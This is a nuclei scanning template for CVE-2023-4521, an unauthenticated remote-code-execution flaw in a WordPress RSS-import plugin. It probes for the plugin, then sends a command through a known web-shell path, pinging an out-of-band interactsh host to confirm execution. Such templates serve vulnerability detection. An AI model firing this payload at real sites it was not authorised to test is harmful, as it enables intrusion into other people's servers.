nuclei-templates/http/cves/2023/CVE-2023-4521.yaml

51 lines
1.5 KiB
YAML
Raw Normal View History

2024-05-06 06:29:20 +00:00
id: CVE-2023-4521
info:
name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
author: princechaddha
severity: critical
description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
impact: |
Allows unauthenticated attackers to execute arbitrary code on the target system.
remediation: |
Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-4521
epss-score: 0.00156
epss-percentile: 0.51418
cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:*
metadata:
vendor: mooveagency
product: import_xml_and_rss_feeds
framework: wordpress
fofa-query: body="import-xml-feed"
tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Import XML and RSS Feeds'
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"